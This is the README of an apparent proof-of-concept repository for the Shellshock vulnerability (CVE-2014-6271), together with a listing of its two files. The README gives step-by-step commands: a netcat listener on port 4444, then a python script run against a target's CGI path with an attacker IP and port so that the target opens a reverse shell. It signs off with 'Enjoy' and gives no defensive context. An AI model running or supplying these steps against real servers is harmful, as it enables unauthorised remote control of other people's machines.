Shellshock POC | CVE-2014-6271 | cgi-bin reverse shell# CVE-2014-6271
### python2.7
- Start listening on your machine.
```
nc -l -p 4444
```
- Run python script by the rule below:
> python shellpoc.py \<host> \<vulnerable CGI> <attackhost/IP>
```
python shellpoc.py 10.10.10.101 /cgi-bin/status 10.10.10.1/4444
```
- Enjoy
[4.0K] /data/pocs/ad72b50f0a713e61e6ae7893aa3d332d99741833
├── [ 273] README.md
└── [ 611] shellpoc.py
0 directories, 2 files